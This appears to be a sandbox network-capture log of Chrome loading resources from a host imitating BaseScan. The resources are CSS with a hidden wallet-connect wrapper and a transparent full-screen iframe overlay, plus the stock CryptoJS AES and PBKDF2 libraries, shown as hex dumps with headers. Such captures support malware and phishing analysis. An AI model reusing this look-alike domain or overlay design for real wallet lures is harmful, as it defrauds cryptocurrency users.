                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 2d 73 69 7a 65 3a 20 32 2e 32 35 72 65 6d 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 2e 35 72 65 6d 3b 0a 7d 0a 2e 74 65 78 74 2d 6c 67 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 32 35 72 65 6d 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 35 72 65 6d 3b 0a 7d 0a 2e 74 65 78 74 2d 73 6d 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 35 72 65 6d 3b 0a 7d 0a 2e 74 65 78 74 2d 78 6c 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 72 65 6d 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 35 72 65 6d 3b 0a 7d 0a 2e 74 65 78 74 2d 78 73 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 0a 20 20
                                                                                                                                                                                                                                              Data Ascii: -size: 2.25rem; line-height: 2.5rem;}.text-lg { font-size: 1.125rem; line-height: 1.75rem;}.text-sm { font-size: 0.875rem; line-height: 1.25rem;}.text-xl { font-size: 1.25rem; line-height: 1.75rem;}.text-xs { font-size: 0.75rem;


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              4192.168.2.549719172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC643OUTGET /styles.css HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC786INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:54 GMT
                                                                                                                                                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 822
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              ETag: "e7032272cb362b17c1a303c757aa7e82"
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1HBAJ1BF5zH85hPhJPYkiLiOb1Lj5NftrfsIONLzPps22LLZXkkgn07moEpYpurvQWMUe99tLhTtkhDTkiYYSkqv6bUKU%2B3PUCUdjyEnWoTyvTY1bAkvGIDTBMH5dZVCiuEIC4Qdtd0%2BfRdIBegZhVflj0ma1I%2FxzQ2gpUooL3g16Z7HRVHC0EK1akf%2BfEDdrdeAeEP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2913cd58ccc-EWR
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC583INData Raw: 62 6f 64 79 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 2f 2a 20 54 72 61 6e 73 70 61 72 65 6e 74 20 62 61 63 6b 67 72 6f 75 6e 64 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 23 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 77 72 61 70 70 65 72 20 7b 0d 0a 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0d 0a 7d 0d 0a 0d 0a 2e 6f 76 65 72 6c 61 79
                                                                                                                                                                                                                                              Data Ascii: body { margin: 0; padding: 0; display: flex; justify-content: center; align-items: center; height: 100vh; background-color: transparent; /* Transparent background */}#walletconnect-wrapper { visibility: hidden;}.overlay
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC239INData Raw: 75 6c 6c 20 68 65 69 67 68 74 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 2f 2a 20 54 72 61 6e 73 70 61 72 65 6e 74 20 62 61 63 6b 67 72 6f 75 6e 64 20 2a 2f 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 2f 2a 20 55 73 65 20 61 62 73 6f 6c 75 74 65 20 70 6f 73 69 74 69 6f 6e 69 6e 67 20 2a 2f 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 2f 2a 20 48 69 64 65 20 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 62 61 72 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 23 77 65 62 73 69 74 65 46 72 61 6d 65 20 7b 0d 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a
                                                                                                                                                                                                                                              Data Ascii: ull height */ background-color: transparent; /* Transparent background */ position: absolute; /* Use absolute positioning */ overflow: hidden; /* Hide iframe scrollbar */}#websiteFrame { width: 100%; height: 100%;}


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              5192.168.2.549720104.17.24.144435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC384OUTGET /ajax/libs/crypto-js/3.1.2/rollups/aes.js HTTP/1.1
                                                                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC934INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:54 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                              ETag: W/"5eb03e2d-3430"
                                                                                                                                                                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 609166
                                                                                                                                                                                                                                              Expires: Thu, 18 Sep 2025 01:15:54 GMT
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qfBpfoRAPmGqY8zWi5jUVoDFH7F9AEnH7iL9EGRuXso8A7ZwMzNsG8%2FLsuo%2BTGcAfPs%2BC9VgJwEqETc8eyIHbIPcQfP%2F0KMSJ2CkHek%2BtUX0MgL%2Btwh2uABbTe647FlwYJHWd00e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2947e6c8c0b-EWR
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC435INData Raw: 33 34 33 30 0d 0a 2f 2a 0a 43 72 79 70 74 6f 4a 53 20 76 33 2e 31 2e 32 0a 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 63 72 79 70 74 6f 2d 6a 73 0a 28 63 29 20 32 30 30 39 2d 32 30 31 33 20 62 79 20 4a 65 66 66 20 4d 6f 74 74 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 63 72 79 70 74 6f 2d 6a 73 2f 77 69 6b 69 2f 4c 69 63 65 6e 73 65 0a 2a 2f 0a 76 61 72 20 43 72 79 70 74 6f 4a 53 3d 43 72 79 70 74 6f 4a 53 7c 7c 66 75 6e 63 74 69 6f 6e 28 75 2c 70 29 7b 76 61 72 20 64 3d 7b 7d 2c 6c 3d 64 2e 6c 69 62 3d 7b 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 3d 6c 2e 42 61 73 65 3d 7b 65 78 74 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                              Data Ascii: 3430/*CryptoJS v3.1.2code.google.com/p/crypto-js(c) 2009-2013 by Jeff Mott. All rights reserved.code.google.com/p/crypto-js/wiki/License*/var CryptoJS=CryptoJS||function(u,p){var d={},l=d.lib={},s=function(){},t=l.Base={extend:function(a){s.protot
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 61 72 20 61 3d 74 68 69 73 2e 65 78 74 65 6e 64 28 29 3b 61 2e 69 6e 69 74 2e 61 70 70 6c 79 28 61 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 61 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6d 69 78 49 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 26 26 28 74 68 69 73 5b 63 5d 3d 61 5b 63 5d 29 3b 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 74 6f 53 74 72 69 6e 67 22 29 26 26 28 74 68 69 73 2e 74 6f 53 74 72 69 6e 67 3d 61 2e 74 6f 53 74 72 69 6e 67 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 2e 70 72 6f 74 6f 74 79 70 65 2e 65 78 74 65 6e 64 28 74 68 69 73
                                                                                                                                                                                                                                              Data Ascii: ar a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 42 79 74 65 73 3b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 6a 3d 30 3b 6a 3c 61 3b 6a 2b 2b 29 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 63 5b 6a 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 38 2a 28 6a 25 34 29 26 32 35 35 29 29 3b 72 65 74 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 22 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 5b 5d 2c 6a 3d 30 3b 6a 3c 63 3b 6a 2b 2b 29 65 5b 6a 3e 3e 3e 32 5d 7c 3d 28 61 2e 63 68 61 72 43 6f 64 65 41 74 28 6a 29 26 32 35 35 29 3c 3c 32 34 2d 38 2a 28 6a 25 34 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 72 2e 69 6e 69 74 28 65 2c 63 29 7d 7d 2c 78 3d 77 2e 55 74 66 38 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                              Data Ascii: Bytes;for(var e=[],j=0;j<a;j++)e.push(String.fromCharCode(c[j>>>2]>>>24-8*(j%4)&255));return e.join("")},parse:function(a){for(var c=a.length,e=[],j=0;j<c;j++)e[j>>>2]|=(a.charCodeAt(j)&255)<<24-8*(j%4);return new r.init(e,c)}},x=w.Utf8={stringify:functio
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 2c 5f 63 72 65 61 74 65 48 6d 61 63 48 65 6c 70 65 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 2c 65 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 6e 2e 48 4d 41 43 2e 69 6e 69 74 28 61 2c 0a 65 29 29 2e 66 69 6e 61 6c 69 7a 65 28 62 29 7d 7d 7d 29 3b 76 61 72 20 6e 3d 64 2e 61 6c 67 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 64 7d 28 4d 61 74 68 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 43 72 79 70 74 6f 4a 53 2c 70 3d 75 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 3b 75 2e 65 6e 63 2e 42 61 73 65 36 34 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 6c 3d 64 2e 77 6f 72 64 73 2c 70 3d 64 2e 73 69 67 42 79 74 65 73 2c 74 3d 74 68 69 73 2e 5f 6d 61 70 3b 64 2e 63 6c
                                                                                                                                                                                                                                              Data Ascii: ,_createHmacHelper:function(a){return function(b,e){return(new n.HMAC.init(a,e)).finalize(b)}}});var n=d.algo={};return d}(Math);(function(){var u=CryptoJS,p=u.lib.WordArray;u.enc.Base64={stringify:function(d){var l=d.words,p=d.sigBytes,t=this._map;d.cl
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 71 2c 6e 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 31 36 3e 61 3b 61 2b 2b 29 7b 76 61 72 20 63 3d 6e 2b 61 2c 65 3d 71 5b 63 5d 3b 71 5b 63 5d 3d 28 65 3c 3c 38 7c 65 3e 3e 3e 32 34 29 26 31 36 37 31 31 39 33 35 7c 28 65 3c 3c 32 34 7c 65 3e 3e 3e 38 29 26 34 32 37 38 32 35 35 33 36 30 7d 76 61 72 20 61 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 63 3d 71 5b 6e 2b 30 5d 2c 65 3d 71 5b 6e 2b 31 5d 2c 6a 3d 71 5b 6e 2b 32 5d 2c 6b 3d 71 5b 6e 2b 33 5d 2c 7a 3d 71 5b 6e 2b 34 5d 2c 72 3d 71 5b 6e 2b 35 5d 2c 74 3d 71 5b 6e 2b 36 5d 2c 77 3d 71 5b 6e 2b 37 5d 2c 76 3d 71 5b 6e 2b 38 5d 2c 41 3d 71 5b 6e 2b 39 5d 2c 42 3d 71 5b 6e 2b 31 30 5d 2c 43 3d 71 5b 6e 2b 31 31 5d 2c
                                                                                                                                                                                                                                              Data Ascii: _doProcessBlock:function(q,n){for(var a=0;16>a;a++){var c=n+a,e=q[c];q[c]=(e<<8|e>>>24)&16711935|(e<<24|e>>>8)&4278255360}var a=this._hash.words,c=q[n+0],e=q[n+1],j=q[n+2],k=q[n+3],z=q[n+4],r=q[n+5],t=q[n+6],w=q[n+7],v=q[n+8],A=q[n+9],B=q[n+10],C=q[n+11],
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 2c 34 2c 62 5b 34 34 5d 29 2c 68 3d 6c 28 68 2c 66 2c 6d 2c 67 2c 75 2c 31 31 2c 62 5b 34 35 5d 29 2c 67 3d 6c 28 67 2c 68 2c 66 2c 6d 2c 78 2c 31 36 2c 62 5b 34 36 5d 29 2c 6d 3d 6c 28 6d 2c 67 2c 68 2c 66 2c 6a 2c 32 33 2c 62 5b 34 37 5d 29 2c 66 3d 73 28 66 2c 6d 2c 67 2c 68 2c 63 2c 36 2c 62 5b 34 38 5d 29 2c 68 3d 73 28 68 2c 66 2c 6d 2c 67 2c 77 2c 31 30 2c 62 5b 34 39 5d 29 2c 67 3d 73 28 67 2c 68 2c 66 2c 6d 2c 0a 45 2c 31 35 2c 62 5b 35 30 5d 29 2c 6d 3d 73 28 6d 2c 67 2c 68 2c 66 2c 72 2c 32 31 2c 62 5b 35 31 5d 29 2c 66 3d 73 28 66 2c 6d 2c 67 2c 68 2c 75 2c 36 2c 62 5b 35 32 5d 29 2c 68 3d 73 28 68 2c 66 2c 6d 2c 67 2c 6b 2c 31 30 2c 62 5b 35 33 5d 29 2c 67 3d 73 28 67 2c 68 2c 66 2c 6d 2c 42 2c 31 35 2c 62 5b 35 34 5d 29 2c 6d 3d 73 28 6d 2c
                                                                                                                                                                                                                                              Data Ascii: ,4,b[44]),h=l(h,f,m,g,u,11,b[45]),g=l(g,h,f,m,x,16,b[46]),m=l(m,g,h,f,j,23,b[47]),f=s(f,m,g,h,c,6,b[48]),h=s(h,f,m,g,w,10,b[49]),g=s(g,h,f,m,E,15,b[50]),m=s(m,g,h,f,r,21,b[51]),f=s(f,m,g,h,u,6,b[52]),h=s(h,f,m,g,k,10,b[53]),g=s(g,h,f,m,B,15,b[54]),m=s(m,
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 79 53 69 7a 65 2c 70 3d 70 2e 69 74 65 72 61 74 69 6f 6e 73 3b 75 2e 6c 65 6e 67 74 68 3c 71 3b 29 7b 6e 26 26 73 2e 75 70 64 61 74 65 28 6e 29 3b 76 61 72 20 6e 3d 73 2e 75 70 64 61 74 65 28 64 29 2e 66 69 6e 61 6c 69 7a 65 28 72 29 3b 73 2e 72 65 73 65 74 28 29 3b 66 6f 72 28 76 61 72 20 61 3d 31 3b 61 3c 70 3b 61 2b 2b 29 6e 3d 73 2e 66 69 6e 61 6c 69 7a 65 28 6e 29 2c 73 2e 72 65 73 65 74 28 29 3b 62 2e 63 6f 6e 63 61 74 28 6e 29 7d 62 2e 73 69 67 42 79 74 65 73 3d 34 2a 71 3b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 75 2e 45 76 70 4b 44 46 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 6c 2c 70 29 7b 72 65 74 75 72 6e 20 73 2e 63 72 65 61 74 65 28 70 29 2e 63 6f 6d 70 75 74 65 28 64 2c 0a 6c 29 7d 7d 29 28 29 3b 0a 43 72 79 70 74 6f 4a 53 2e 6c 69 62 2e 43 69 70 68
                                                                                                                                                                                                                                              Data Ascii: ySize,p=p.iterations;u.length<q;){n&&s.update(n);var n=s.update(d).finalize(r);s.reset();for(var a=1;a<p;a++)n=s.finalize(n),s.reset();b.concat(n)}b.sigBytes=4*q;return b}});u.EvpKDF=function(d,l,p){return s.create(p).compute(d,l)}})();CryptoJS.lib.Ciph
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 2c 61 29 7d 2c 63 72 65 61 74 65 44 65 63 72 79 70 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 44 65 63 72 79 70 74 6f 72 2e 63 72 65 61 74 65 28 65 2c 61 29 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 74 68 69 73 2e 5f 63 69 70 68 65 72 3d 65 3b 74 68 69 73 2e 5f 69 76 3d 61 7d 7d 29 29 2e 65 78 74 65 6e 64 28 29 3b 71 2e 45 6e 63 72 79 70 74 6f 72 3d 71 2e 65 78 74 65 6e 64 28 7b 70 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 5f 63 69 70 68 65 72 2c 63 3d 62 2e 62 6c 6f 63 6b 53 69 7a 65 3b 78 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 61 2c 63 29 3b 62 2e 65 6e 63 72 79 70 74 42 6c 6f 63 6b 28 65 2c 61 29 3b 74 68 69 73 2e 5f
                                                                                                                                                                                                                                              Data Ascii: ,a)},createDecryptor:function(e,a){return this.Decryptor.create(e,a)},init:function(e,a){this._cipher=e;this._iv=a}})).extend();q.Encryptor=q.extend({processBlock:function(e,a){var b=this._cipher,c=b.blockSize;x.call(this,e,a,c);b.encryptBlock(e,a);this._
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 63 69 70 68 65 72 74 65 78 74 3b 61 3d 61 2e 73 61 6c 74 3b 72 65 74 75 72 6e 28 61 3f 73 2e 63 72 65 61 74 65 28 5b 31 33 39 38 38 39 33 36 38 34 2c 0a 31 37 30 31 30 37 36 38 33 31 5d 29 2e 63 6f 6e 63 61 74 28 61 29 2e 63 6f 6e 63 61 74 28 62 29 3a 62 29 2e 74 6f 53 74 72 69 6e 67 28 72 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 72 2e 70 61 72 73 65 28 61 29 3b 76 61 72 20 62 3d 61 2e 77 6f 72 64 73 3b 69 66 28 31 33 39 38 38 39 33 36 38 34 3d 3d 62 5b 30 5d 26 26 31 37 30 31 30 37 36 38 33 31 3d 3d 62 5b 31 5d 29 7b 76 61 72 20 63 3d 73 2e 63 72 65 61 74 65 28 62 2e 73 6c 69 63 65 28 32 2c 34 29 29 3b 62 2e 73 70 6c 69 63 65 28 30 2c 34 29 3b 61 2e 73 69 67 42 79
                                                                                                                                                                                                                                              Data Ascii: :function(a){var b=a.ciphertext;a=a.salt;return(a?s.create([1398893684,1701076831]).concat(a).concat(b):b).toString(r)},parse:function(a){a=r.parse(a);var b=a.words;if(1398893684==b[0]&&1701076831==b[1]){var c=s.create(b.slice(2,4));b.splice(0,4);a.sigBy
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 75 3d 43 72 79 70 74 6f 4a 53 2c 70 3d 75 2e 6c 69 62 2e 42 6c 6f 63 6b 43 69 70 68 65 72 2c 64 3d 75 2e 61 6c 67 6f 2c 6c 3d 5b 5d 2c 73 3d 5b 5d 2c 74 3d 5b 5d 2c 72 3d 5b 5d 2c 77 3d 5b 5d 2c 76 3d 5b 5d 2c 62 3d 5b 5d 2c 78 3d 5b 5d 2c 71 3d 5b 5d 2c 6e 3d 5b 5d 2c 61 3d 5b 5d 2c 63 3d 30 3b 32 35 36 3e 63 3b 63 2b 2b 29 61 5b 63 5d 3d 31 32 38 3e 63 3f 63 3c 3c 31 3a 63 3c 3c 31 5e 32 38 33 3b 66 6f 72 28 76 61 72 20 65 3d 30 2c 6a 3d 30 2c 63 3d 30 3b 32 35 36 3e 63 3b 63 2b 2b 29 7b 76 61 72 20 6b 3d 6a 5e 6a 3c 3c 31 5e 6a 3c 3c 32 5e 6a 3c 3c 33 5e 6a 3c 3c 34 2c 6b 3d 6b 3e 3e 3e 38 5e 6b 26 32 35 35 5e 39 39 3b 6c 5b 65 5d 3d 6b 3b 73 5b 6b 5d 3d 65 3b 76 61 72 20 7a 3d 61 5b 65 5d 2c 46 3d
                                                                                                                                                                                                                                              Data Ascii: unction(){for(var u=CryptoJS,p=u.lib.BlockCipher,d=u.algo,l=[],s=[],t=[],r=[],w=[],v=[],b=[],x=[],q=[],n=[],a=[],c=0;256>c;c++)a[c]=128>c?c<<1:c<<1^283;for(var e=0,j=0,c=0;256>c;c++){var k=j^j<<1^j<<2^j<<3^j<<4,k=k>>>8^k&255^99;l[e]=k;s[k]=e;var z=a[e],F=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              6192.168.2.549722104.17.25.144435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC614OUTGET /ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js HTTP/1.1
                                                                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:55 UTC924INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:55 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                              ETag: W/"5eb03e2d-1596"
                                                                                                                                                                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                              Expires: Thu, 18 Sep 2025 01:15:55 GMT
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmagG1um4DiwnjMc%2Ff%2Bqb4ojv4azPNuIEKXZ8eqzcVZ2f2XoNmhRaVQrsxum6hm%2B9OZ6Qh0SXDdIU65QOMMQAYojPNn%2FeuJkv%2BNyTe%2FPEr8FraCIceF6JAFAEBXWKqovJ%2FuUjIKZ"}],"group":"cf-nel","max_age":604800}
